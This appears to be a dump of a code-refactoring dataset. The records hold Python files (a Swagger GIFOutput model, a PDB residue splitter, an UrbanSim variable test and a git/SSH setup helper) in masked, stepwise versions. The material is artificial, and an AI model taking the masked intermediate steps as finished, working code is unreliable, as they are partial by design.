GIFOutput.\n\n Seconds for the duration of the GIF. 
Can't be longer than the video.\n\n :return: The duration of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._duration\n\n @duration.setter\n def duration(self, duration):\n \"\"\"Sets the duration of this GIFOutput.\n\n Seconds for the duration of the GIF. Can't be longer than the video.\n\n :param duration: The duration of this GIFOutput.\n :type: float\n \"\"\"\n\n self._duration = duration\n\n @property\n def suffix(self):\n \"\"\"Gets the suffix of this GIFOutput.\n\n Unique ending of the file name so several outputs can be created then identified. Required if there is more\n then 1 video output.\n\n :return: The suffix of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._suffix\n\n @suffix.setter\n def suffix(self, suffix):\n \"\"\"Sets the suffix of this GIFOutput.\n\n Unique ending of the file name so several outputs can be created then identified. Required if there is more\n then 1 video output.\n\n :param suffix: The suffix of this GIFOutput.\n :type: str\n \"\"\"\n\n self._suffix = suffix\n\n @property\n def overlay(self):\n \"\"\"Gets the overlay of this GIFOutput.\n\n Path to overlay image, such as: play button or watermark.\n\n :return: The overlay of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._overlay\n\n @overlay.setter\n def overlay(self, overlay):\n \"\"\"Sets the overlay of this GIFOutput.\n\n Path to overlay image, such as: play button or watermark.\n\n :param overlay: The overlay of this GIFOutput.\n :type: str\n \"\"\"\n\n self._overlay = overlay\n\n @property\n def overlay_alignment(self):\n \"\"\"Gets the overlay_alignment of this GIFOutput.\n\n Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is\n X. 
The second is Y.\n\n :return: The overlay_alignment of this GIFOutput.\n :rtype: list[str]\n \"\"\"\n return self._overlay_alignment\n\n @overlay_alignment.setter\n def overlay_alignment(self, overlay_alignment):\n \"\"\"Sets the overlay_alignment of this GIFOutput.\n\n Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is\n X. The second is Y.\n\n :param overlay_alignment: The overlay_alignment of this GIFOutput.\n :type: list[str]\n \"\"\"\n allowed_values = [\"left\", \"center\", \"right\", \"top\", \"middle\", \"bottom\"]\n if not set(overlay_alignment).issubset(set(allowed_values)):\n raise ValueError(\n \"Invalid values for `overlay_alignment` [{0}], must be a subset of [{1}]\"\n .format(\", \".join(map(str, set(overlay_alignment) - set(allowed_values))),\n \", \".join(map(str, allowed_values)))\n )\n\n self._overlay_alignment = overlay_alignment\n\n @property\n def overlay_scale(self):\n \"\"\"Gets the overlay_scale of this GIFOutput.\n\n Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's\n completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the\n image according to the alignment settings. * Fill: scale the image up or down so it completely fills the\n video. If not the same aspect ratio, the image is cropped according to the alignment settings. * None: don't\n resize the overlay image.\n\n :return: The overlay_scale of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._overlay_scale\n\n @overlay_scale.setter\n def overlay_scale(self, overlay_scale):\n \"\"\"Sets the overlay_scale of this GIFOutput.\n\n Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's\n completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the\n image according to the alignment settings. 
* Fill: scale the image up or down so it completely fills the\n video. If not the same aspect ratio, the image is cropped according to the alignment settings. * None: don't\n resize the overlay image.\n\n :param overlay_scale: The overlay_scale of this GIFOutput.\n :type: str\n \"\"\"\n allowed_values = [\"fit\", \"fill\", \"none\"]\n if overlay_scale not in allowed_values:\n raise ValueError(\n \"Invalid value for `overlay_scale` ({0}), must be one of {1}\"\n .format(overlay_scale, allowed_values)\n )\n\n self._overlay_scale = overlay_scale\n\n @property\n def label(self):\n \"\"\"Gets the label of this GIFOutput.\n\n This label is another way to identify this specific output. The label is returned in the response,\n but does not appear in the file name.\n\n :return: The label of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._label\n\n @label.setter\n def label(self, label):\n \"\"\"Sets the label of this GIFOutput.\n\n This label is another way to identify this specific output. 
The label is returned in the response,\n but does not appear in the file name.\n\n :param label: The label of this GIFOutput.\n :type: str\n \"\"\"\n\n self._label = label\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, GIFOutput):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n",
"step-ids": [
27,
28,
29,
31,
33
]
}
|
[
27,
28,
29,
31,
33
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for l in pdb:
if not l.startswith('ATOM'):
continue
if int(l[22:26]) != resid:
res.append([])
resid = int(l[22:26])
res[-1].append(l)
for i in range(len(res) - 2):
outp = open('%s%d-%dr.pdb' % (name, i + 1, i + 3), 'w')
for r in res[i:i + 3]:
for j in r:
print >> outp, j
<|reserved_special_token_1|>
<|reserved_special_token_0|>
pdb = open(sys.argv[1])
name = sys.argv[2]
res = []
resid = None
for l in pdb:
if not l.startswith('ATOM'):
continue
if int(l[22:26]) != resid:
res.append([])
resid = int(l[22:26])
res[-1].append(l)
for i in range(len(res) - 2):
outp = open('%s%d-%dr.pdb' % (name, i + 1, i + 3), 'w')
for r in res[i:i + 3]:
for j in r:
print >> outp, j
<|reserved_special_token_1|>
import sys
pdb = open(sys.argv[1])
name = sys.argv[2]
res = []
resid = None
for l in pdb:
if not l.startswith('ATOM'):
continue
if int(l[22:26]) != resid:
res.append([])
resid = int(l[22:26])
res[-1].append(l)
for i in range(len(res) - 2):
outp = open('%s%d-%dr.pdb' % (name, i + 1, i + 3), 'w')
for r in res[i:i + 3]:
for j in r:
print >> outp, j
<|reserved_special_token_1|>
import sys
pdb = open(sys.argv[1])
name = sys.argv[2]
res = []
resid = None
for l in pdb:
if not l.startswith("ATOM"):
continue
if int(l[22:26]) != resid:
res.append([])
resid = int(l[22:26])
res[-1].append(l)
for i in range(len(res)-2):
outp = open("%s%d-%dr.pdb"%(name,i+1,i+3), "w")
for r in res[i:i+3]:
for j in r:
print >> outp, j,
|
flexible
|
{
"blob_id": "d867d17b2873de7c63d0ff29eb585cce1a68dda6",
"index": 6081,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor l in pdb:\n if not l.startswith('ATOM'):\n continue\n if int(l[22:26]) != resid:\n res.append([])\n resid = int(l[22:26])\n res[-1].append(l)\nfor i in range(len(res) - 2):\n outp = open('%s%d-%dr.pdb' % (name, i + 1, i + 3), 'w')\n for r in res[i:i + 3]:\n for j in r:\n print >> outp, j\n",
"step-3": "<mask token>\npdb = open(sys.argv[1])\nname = sys.argv[2]\nres = []\nresid = None\nfor l in pdb:\n if not l.startswith('ATOM'):\n continue\n if int(l[22:26]) != resid:\n res.append([])\n resid = int(l[22:26])\n res[-1].append(l)\nfor i in range(len(res) - 2):\n outp = open('%s%d-%dr.pdb' % (name, i + 1, i + 3), 'w')\n for r in res[i:i + 3]:\n for j in r:\n print >> outp, j\n",
"step-4": "import sys\npdb = open(sys.argv[1])\nname = sys.argv[2]\nres = []\nresid = None\nfor l in pdb:\n if not l.startswith('ATOM'):\n continue\n if int(l[22:26]) != resid:\n res.append([])\n resid = int(l[22:26])\n res[-1].append(l)\nfor i in range(len(res) - 2):\n outp = open('%s%d-%dr.pdb' % (name, i + 1, i + 3), 'w')\n for r in res[i:i + 3]:\n for j in r:\n print >> outp, j\n",
"step-5": "import sys\n\npdb = open(sys.argv[1])\nname = sys.argv[2]\n\nres = []\nresid = None\nfor l in pdb:\n if not l.startswith(\"ATOM\"):\n continue\n if int(l[22:26]) != resid:\n res.append([])\n resid = int(l[22:26])\n res[-1].append(l)\n\nfor i in range(len(res)-2):\n outp = open(\"%s%d-%dr.pdb\"%(name,i+1,i+3), \"w\")\n for r in res[i:i+3]:\n for j in r:\n print >> outp, j,\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Opus/UrbanSim urban simulation software.
# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington
# See opus_core/LICENSE
from opus_core.variables.variable import Variable
from variable_functions import my_attribute_label
class total_land_value_if_in_plan_type_group_SSS(Variable):
"""Sum of land values of locations if in plan_type_group SSS, 0 otherwise."""
def __init__(self, group):
self.group = group
Variable.__init__(self)
def dependencies(self):
return [my_attribute_label("is_in_plan_type_group_%s" % self.group),
my_attribute_label("total_land_value")]
def compute(self, dataset_pool):
return self.get_dataset().get_attribute("is_in_plan_type_group_%s" % self.group) * \
self.get_dataset().get_attribute("total_land_value")
def post_check(self, values, dataset_pool):
self.do_check("x >= 0", values)
from opus_core.tests import opus_unittest
from opus_core.tests.utils.variable_tester import VariableTester
from numpy import array
class Tests(opus_unittest.OpusTestCase):
def test_my_inputs(self):
total_land_value = array([100, 200, 300])
is_in_plan_type_group_residential = array([1, 0, 1])
tester = VariableTester(
__file__,
package_order=['urbansim'],
test_data={
"gridcell":{
"grid_id":array([1,2,3]),
"total_land_value":total_land_value,
"is_in_plan_type_group_residential":is_in_plan_type_group_residential
}
}
)
should_be = array([100, 0, 300])
instance_name = "urbansim.gridcell.total_land_value_if_in_plan_type_group_residential"
tester.test_is_equal_for_family_variable(self, should_be, instance_name)
if __name__=='__main__':
opus_unittest.main()
|
normal
|
{
"blob_id": "52bb10e19c7a5645ca3cf91705b9b0affe75f570",
"index": 4764,
"step-1": "<mask token>\n\n\nclass total_land_value_if_in_plan_type_group_SSS(Variable):\n <mask token>\n\n def __init__(self, group):\n self.group = group\n Variable.__init__(self)\n\n def dependencies(self):\n return [my_attribute_label('is_in_plan_type_group_%s' % self.group),\n my_attribute_label('total_land_value')]\n\n def compute(self, dataset_pool):\n return self.get_dataset().get_attribute('is_in_plan_type_group_%s' %\n self.group) * self.get_dataset().get_attribute('total_land_value')\n <mask token>\n\n\n<mask token>\n\n\nclass Tests(opus_unittest.OpusTestCase):\n\n def test_my_inputs(self):\n total_land_value = array([100, 200, 300])\n is_in_plan_type_group_residential = array([1, 0, 1])\n tester = VariableTester(__file__, package_order=['urbansim'],\n test_data={'gridcell': {'grid_id': array([1, 2, 3]),\n 'total_land_value': total_land_value,\n 'is_in_plan_type_group_residential':\n is_in_plan_type_group_residential}})\n should_be = array([100, 0, 300])\n instance_name = (\n 'urbansim.gridcell.total_land_value_if_in_plan_type_group_residential'\n )\n tester.test_is_equal_for_family_variable(self, should_be, instance_name\n )\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass total_land_value_if_in_plan_type_group_SSS(Variable):\n <mask token>\n\n def __init__(self, group):\n self.group = group\n Variable.__init__(self)\n\n def dependencies(self):\n return [my_attribute_label('is_in_plan_type_group_%s' % self.group),\n my_attribute_label('total_land_value')]\n\n def compute(self, dataset_pool):\n return self.get_dataset().get_attribute('is_in_plan_type_group_%s' %\n self.group) * self.get_dataset().get_attribute('total_land_value')\n\n def post_check(self, values, dataset_pool):\n self.do_check('x >= 0', values)\n\n\n<mask token>\n\n\nclass Tests(opus_unittest.OpusTestCase):\n\n def test_my_inputs(self):\n total_land_value = array([100, 200, 300])\n is_in_plan_type_group_residential = array([1, 0, 1])\n tester = VariableTester(__file__, package_order=['urbansim'],\n test_data={'gridcell': {'grid_id': array([1, 2, 3]),\n 'total_land_value': total_land_value,\n 'is_in_plan_type_group_residential':\n is_in_plan_type_group_residential}})\n should_be = array([100, 0, 300])\n instance_name = (\n 'urbansim.gridcell.total_land_value_if_in_plan_type_group_residential'\n )\n tester.test_is_equal_for_family_variable(self, should_be, instance_name\n )\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass total_land_value_if_in_plan_type_group_SSS(Variable):\n \"\"\"Sum of land values of locations if in plan_type_group SSS, 0 otherwise.\"\"\"\n\n def __init__(self, group):\n self.group = group\n Variable.__init__(self)\n\n def dependencies(self):\n return [my_attribute_label('is_in_plan_type_group_%s' % self.group),\n my_attribute_label('total_land_value')]\n\n def compute(self, dataset_pool):\n return self.get_dataset().get_attribute('is_in_plan_type_group_%s' %\n self.group) * self.get_dataset().get_attribute('total_land_value')\n\n def post_check(self, values, dataset_pool):\n self.do_check('x >= 0', values)\n\n\n<mask token>\n\n\nclass Tests(opus_unittest.OpusTestCase):\n\n def test_my_inputs(self):\n total_land_value = array([100, 200, 300])\n is_in_plan_type_group_residential = array([1, 0, 1])\n tester = VariableTester(__file__, package_order=['urbansim'],\n test_data={'gridcell': {'grid_id': array([1, 2, 3]),\n 'total_land_value': total_land_value,\n 'is_in_plan_type_group_residential':\n is_in_plan_type_group_residential}})\n should_be = array([100, 0, 300])\n instance_name = (\n 'urbansim.gridcell.total_land_value_if_in_plan_type_group_residential'\n )\n tester.test_is_equal_for_family_variable(self, should_be, instance_name\n )\n\n\nif __name__ == '__main__':\n opus_unittest.main()\n",
"step-4": "from opus_core.variables.variable import Variable\nfrom variable_functions import my_attribute_label\n\n\nclass total_land_value_if_in_plan_type_group_SSS(Variable):\n \"\"\"Sum of land values of locations if in plan_type_group SSS, 0 otherwise.\"\"\"\n\n def __init__(self, group):\n self.group = group\n Variable.__init__(self)\n\n def dependencies(self):\n return [my_attribute_label('is_in_plan_type_group_%s' % self.group),\n my_attribute_label('total_land_value')]\n\n def compute(self, dataset_pool):\n return self.get_dataset().get_attribute('is_in_plan_type_group_%s' %\n self.group) * self.get_dataset().get_attribute('total_land_value')\n\n def post_check(self, values, dataset_pool):\n self.do_check('x >= 0', values)\n\n\nfrom opus_core.tests import opus_unittest\nfrom opus_core.tests.utils.variable_tester import VariableTester\nfrom numpy import array\n\n\nclass Tests(opus_unittest.OpusTestCase):\n\n def test_my_inputs(self):\n total_land_value = array([100, 200, 300])\n is_in_plan_type_group_residential = array([1, 0, 1])\n tester = VariableTester(__file__, package_order=['urbansim'],\n test_data={'gridcell': {'grid_id': array([1, 2, 3]),\n 'total_land_value': total_land_value,\n 'is_in_plan_type_group_residential':\n is_in_plan_type_group_residential}})\n should_be = array([100, 0, 300])\n instance_name = (\n 'urbansim.gridcell.total_land_value_if_in_plan_type_group_residential'\n )\n tester.test_is_equal_for_family_variable(self, should_be, instance_name\n )\n\n\nif __name__ == '__main__':\n opus_unittest.main()\n",
"step-5": "# Opus/UrbanSim urban simulation software.\r\n# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington\r\n# See opus_core/LICENSE\r\n\r\nfrom opus_core.variables.variable import Variable\r\nfrom variable_functions import my_attribute_label\r\n\r\nclass total_land_value_if_in_plan_type_group_SSS(Variable):\r\n \"\"\"Sum of land values of locations if in plan_type_group SSS, 0 otherwise.\"\"\"\r\n\r\n def __init__(self, group):\r\n self.group = group\r\n Variable.__init__(self)\r\n\r\n def dependencies(self):\r\n return [my_attribute_label(\"is_in_plan_type_group_%s\" % self.group), \r\n my_attribute_label(\"total_land_value\")]\r\n\r\n def compute(self, dataset_pool):\r\n return self.get_dataset().get_attribute(\"is_in_plan_type_group_%s\" % self.group) * \\\r\n self.get_dataset().get_attribute(\"total_land_value\")\r\n\r\n def post_check(self, values, dataset_pool):\r\n self.do_check(\"x >= 0\", values)\r\n\r\n\r\nfrom opus_core.tests import opus_unittest\r\nfrom opus_core.tests.utils.variable_tester import VariableTester\r\nfrom numpy import array\r\nclass Tests(opus_unittest.OpusTestCase):\r\n def test_my_inputs(self):\r\n total_land_value = array([100, 200, 300])\r\n is_in_plan_type_group_residential = array([1, 0, 1])\r\n\r\n tester = VariableTester(\r\n __file__,\r\n package_order=['urbansim'],\r\n test_data={\r\n \"gridcell\":{ \r\n \"grid_id\":array([1,2,3]),\r\n \"total_land_value\":total_land_value, \r\n \"is_in_plan_type_group_residential\":is_in_plan_type_group_residential\r\n }\r\n }\r\n )\r\n \r\n should_be = array([100, 0, 300])\r\n instance_name = \"urbansim.gridcell.total_land_value_if_in_plan_type_group_residential\"\r\n tester.test_is_equal_for_family_variable(self, should_be, instance_name)\r\n\r\n\r\nif __name__=='__main__':\r\n opus_unittest.main()",
"step-ids": [
6,
7,
9,
10,
11
]
}
|
[
6,
7,
9,
10,
11
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import numpy
import math
import operator
<|reserved_special_token_1|>
import numpy
#Matrixmultiplikation
#Matrixinvertierung
#nicht p inv
#selbst invertierbar machen
import math
import operator
|
flexible
|
{
"blob_id": "ece20c8c8fae2225cbac3552e254314b7116057c",
"index": 7095,
"step-1": "<mask token>\n",
"step-2": "import numpy\nimport math\nimport operator\n",
"step-3": "import numpy\n#Matrixmultiplikation\n#Matrixinvertierung\n#nicht p inv\n#selbst invertierbar machen\n\nimport math\nimport operator",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def init_ssh(key: str, key_path: Path) ->None:
if not key:
logging.warning('Private Key required for SSH Git')
return
logging.info('Private Key found, writing to disk')
key_path.mkdir(exist_ok=True)
key_file = Path(key_path, 'id_rsa')
if not key_file.exists():
key_file.write_text(f'{key}\n', encoding='UTF-8')
key_file.chmod(256)
scan = subprocess.run(['ssh-keyscan', '-t', 'rsa', 'github.com'],
stdout=subprocess.PIPE, check=False)
Path(key_path, 'known_hosts').write_text(scan.stdout.decode('utf-8'
), encoding='UTF-8')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def init_ssh(key: str, key_path: Path) ->None:
if not key:
logging.warning('Private Key required for SSH Git')
return
logging.info('Private Key found, writing to disk')
key_path.mkdir(exist_ok=True)
key_file = Path(key_path, 'id_rsa')
if not key_file.exists():
key_file.write_text(f'{key}\n', encoding='UTF-8')
key_file.chmod(256)
scan = subprocess.run(['ssh-keyscan', '-t', 'rsa', 'github.com'],
stdout=subprocess.PIPE, check=False)
Path(key_path, 'known_hosts').write_text(scan.stdout.decode('utf-8'
), encoding='UTF-8')
def repo_file_add_or_changed(repo: Repo, filename: Union[str, Path]) ->bool:
if repo.working_dir:
relative_file = Path(filename).relative_to(repo.working_dir).as_posix()
if relative_file in repo.untracked_files:
return True
if relative_file in [x.a_path for x in repo.index.diff(None)]:
return True
return False
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def init_repo(metadata: str, path: str, deep_clone: bool) ->Repo:
clone_path = Path(path)
if not clone_path.exists():
logging.info('Cloning %s', metadata)
repo = Repo.clone_from(metadata, clone_path
) if deep_clone else Repo.clone_from(metadata, clone_path, depth=1)
else:
repo = Repo(clone_path)
return repo
def init_ssh(key: str, key_path: Path) ->None:
if not key:
logging.warning('Private Key required for SSH Git')
return
logging.info('Private Key found, writing to disk')
key_path.mkdir(exist_ok=True)
key_file = Path(key_path, 'id_rsa')
if not key_file.exists():
key_file.write_text(f'{key}\n', encoding='UTF-8')
key_file.chmod(256)
scan = subprocess.run(['ssh-keyscan', '-t', 'rsa', 'github.com'],
stdout=subprocess.PIPE, check=False)
Path(key_path, 'known_hosts').write_text(scan.stdout.decode('utf-8'
), encoding='UTF-8')
def repo_file_add_or_changed(repo: Repo, filename: Union[str, Path]) ->bool:
if repo.working_dir:
relative_file = Path(filename).relative_to(repo.working_dir).as_posix()
if relative_file in repo.untracked_files:
return True
if relative_file in [x.a_path for x in repo.index.diff(None)]:
return True
return False
<|reserved_special_token_1|>
import logging
import subprocess
from pathlib import Path
from typing import Union
from git import Repo
def init_repo(metadata: str, path: str, deep_clone: bool) ->Repo:
clone_path = Path(path)
if not clone_path.exists():
logging.info('Cloning %s', metadata)
repo = Repo.clone_from(metadata, clone_path
) if deep_clone else Repo.clone_from(metadata, clone_path, depth=1)
else:
repo = Repo(clone_path)
return repo
def init_ssh(key: str, key_path: Path) ->None:
if not key:
logging.warning('Private Key required for SSH Git')
return
logging.info('Private Key found, writing to disk')
key_path.mkdir(exist_ok=True)
key_file = Path(key_path, 'id_rsa')
if not key_file.exists():
key_file.write_text(f'{key}\n', encoding='UTF-8')
key_file.chmod(256)
scan = subprocess.run(['ssh-keyscan', '-t', 'rsa', 'github.com'],
stdout=subprocess.PIPE, check=False)
Path(key_path, 'known_hosts').write_text(scan.stdout.decode('utf-8'
), encoding='UTF-8')
def repo_file_add_or_changed(repo: Repo, filename: Union[str, Path]) ->bool:
if repo.working_dir:
relative_file = Path(filename).relative_to(repo.working_dir).as_posix()
if relative_file in repo.untracked_files:
return True
if relative_file in [x.a_path for x in repo.index.diff(None)]:
return True
return False
<|reserved_special_token_1|>
import logging
import subprocess
from pathlib import Path
from typing import Union
from git import Repo
def init_repo(metadata: str, path: str, deep_clone: bool) -> Repo:
clone_path = Path(path)
if not clone_path.exists():
logging.info('Cloning %s', metadata)
repo = (Repo.clone_from(metadata, clone_path)
if deep_clone else
Repo.clone_from(metadata, clone_path, depth=1))
else:
repo = Repo(clone_path)
return repo
def init_ssh(key: str, key_path: Path) -> None:
if not key:
logging.warning('Private Key required for SSH Git')
return
logging.info('Private Key found, writing to disk')
key_path.mkdir(exist_ok=True)
key_file = Path(key_path, 'id_rsa')
if not key_file.exists():
key_file.write_text(f'{key}\n', encoding='UTF-8')
key_file.chmod(0o400)
scan = subprocess.run([
'ssh-keyscan', '-t', 'rsa', 'github.com'
], stdout=subprocess.PIPE, check=False)
Path(key_path, 'known_hosts').write_text(scan.stdout.decode('utf-8'), encoding='UTF-8')
def repo_file_add_or_changed(repo: Repo, filename: Union[str, Path]) -> bool:
if repo.working_dir:
relative_file = Path(filename).relative_to(repo.working_dir).as_posix()
if relative_file in repo.untracked_files:
return True
if relative_file in [
x.a_path for x in repo.index.diff(None)]:
return True
return False
|
flexible
|
{
"blob_id": "cb2dd08a09d2e39bd83f82940c3d9a79a5a27918",
"index": 6523,
"step-1": "<mask token>\n\n\ndef init_ssh(key: str, key_path: Path) ->None:\n if not key:\n logging.warning('Private Key required for SSH Git')\n return\n logging.info('Private Key found, writing to disk')\n key_path.mkdir(exist_ok=True)\n key_file = Path(key_path, 'id_rsa')\n if not key_file.exists():\n key_file.write_text(f'{key}\\n', encoding='UTF-8')\n key_file.chmod(256)\n scan = subprocess.run(['ssh-keyscan', '-t', 'rsa', 'github.com'],\n stdout=subprocess.PIPE, check=False)\n Path(key_path, 'known_hosts').write_text(scan.stdout.decode('utf-8'\n ), encoding='UTF-8')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef init_ssh(key: str, key_path: Path) ->None:\n if not key:\n logging.warning('Private Key required for SSH Git')\n return\n logging.info('Private Key found, writing to disk')\n key_path.mkdir(exist_ok=True)\n key_file = Path(key_path, 'id_rsa')\n if not key_file.exists():\n key_file.write_text(f'{key}\\n', encoding='UTF-8')\n key_file.chmod(256)\n scan = subprocess.run(['ssh-keyscan', '-t', 'rsa', 'github.com'],\n stdout=subprocess.PIPE, check=False)\n Path(key_path, 'known_hosts').write_text(scan.stdout.decode('utf-8'\n ), encoding='UTF-8')\n\n\ndef repo_file_add_or_changed(repo: Repo, filename: Union[str, Path]) ->bool:\n if repo.working_dir:\n relative_file = Path(filename).relative_to(repo.working_dir).as_posix()\n if relative_file in repo.untracked_files:\n return True\n if relative_file in [x.a_path for x in repo.index.diff(None)]:\n return True\n return False\n",
"step-3": "<mask token>\n\n\ndef init_repo(metadata: str, path: str, deep_clone: bool) ->Repo:\n clone_path = Path(path)\n if not clone_path.exists():\n logging.info('Cloning %s', metadata)\n repo = Repo.clone_from(metadata, clone_path\n ) if deep_clone else Repo.clone_from(metadata, clone_path, depth=1)\n else:\n repo = Repo(clone_path)\n return repo\n\n\ndef init_ssh(key: str, key_path: Path) ->None:\n if not key:\n logging.warning('Private Key required for SSH Git')\n return\n logging.info('Private Key found, writing to disk')\n key_path.mkdir(exist_ok=True)\n key_file = Path(key_path, 'id_rsa')\n if not key_file.exists():\n key_file.write_text(f'{key}\\n', encoding='UTF-8')\n key_file.chmod(256)\n scan = subprocess.run(['ssh-keyscan', '-t', 'rsa', 'github.com'],\n stdout=subprocess.PIPE, check=False)\n Path(key_path, 'known_hosts').write_text(scan.stdout.decode('utf-8'\n ), encoding='UTF-8')\n\n\ndef repo_file_add_or_changed(repo: Repo, filename: Union[str, Path]) ->bool:\n if repo.working_dir:\n relative_file = Path(filename).relative_to(repo.working_dir).as_posix()\n if relative_file in repo.untracked_files:\n return True\n if relative_file in [x.a_path for x in repo.index.diff(None)]:\n return True\n return False\n",
"step-4": "import logging\nimport subprocess\nfrom pathlib import Path\nfrom typing import Union\nfrom git import Repo\n\n\ndef init_repo(metadata: str, path: str, deep_clone: bool) ->Repo:\n clone_path = Path(path)\n if not clone_path.exists():\n logging.info('Cloning %s', metadata)\n repo = Repo.clone_from(metadata, clone_path\n ) if deep_clone else Repo.clone_from(metadata, clone_path, depth=1)\n else:\n repo = Repo(clone_path)\n return repo\n\n\ndef init_ssh(key: str, key_path: Path) ->None:\n if not key:\n logging.warning('Private Key required for SSH Git')\n return\n logging.info('Private Key found, writing to disk')\n key_path.mkdir(exist_ok=True)\n key_file = Path(key_path, 'id_rsa')\n if not key_file.exists():\n key_file.write_text(f'{key}\\n', encoding='UTF-8')\n key_file.chmod(256)\n scan = subprocess.run(['ssh-keyscan', '-t', 'rsa', 'github.com'],\n stdout=subprocess.PIPE, check=False)\n Path(key_path, 'known_hosts').write_text(scan.stdout.decode('utf-8'\n ), encoding='UTF-8')\n\n\ndef repo_file_add_or_changed(repo: Repo, filename: Union[str, Path]) ->bool:\n if repo.working_dir:\n relative_file = Path(filename).relative_to(repo.working_dir).as_posix()\n if relative_file in repo.untracked_files:\n return True\n if relative_file in [x.a_path for x in repo.index.diff(None)]:\n return True\n return False\n",
"step-5": "import logging\nimport subprocess\nfrom pathlib import Path\nfrom typing import Union\nfrom git import Repo\n\n\ndef init_repo(metadata: str, path: str, deep_clone: bool) -> Repo:\n clone_path = Path(path)\n if not clone_path.exists():\n logging.info('Cloning %s', metadata)\n repo = (Repo.clone_from(metadata, clone_path)\n if deep_clone else\n Repo.clone_from(metadata, clone_path, depth=1))\n else:\n repo = Repo(clone_path)\n return repo\n\n\ndef init_ssh(key: str, key_path: Path) -> None:\n if not key:\n logging.warning('Private Key required for SSH Git')\n return\n logging.info('Private Key found, writing to disk')\n key_path.mkdir(exist_ok=True)\n key_file = Path(key_path, 'id_rsa')\n if not key_file.exists():\n key_file.write_text(f'{key}\\n', encoding='UTF-8')\n key_file.chmod(0o400)\n scan = subprocess.run([\n 'ssh-keyscan', '-t', 'rsa', 'github.com'\n ], stdout=subprocess.PIPE, check=False)\n Path(key_path, 'known_hosts').write_text(scan.stdout.decode('utf-8'), encoding='UTF-8')\n\n\ndef repo_file_add_or_changed(repo: Repo, filename: Union[str, Path]) -> bool:\n if repo.working_dir:\n relative_file = Path(filename).relative_to(repo.working_dir).as_posix()\n if relative_file in repo.untracked_files:\n return True\n if relative_file in [\n x.a_path for x in repo.index.diff(None)]:\n return True\n return False\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.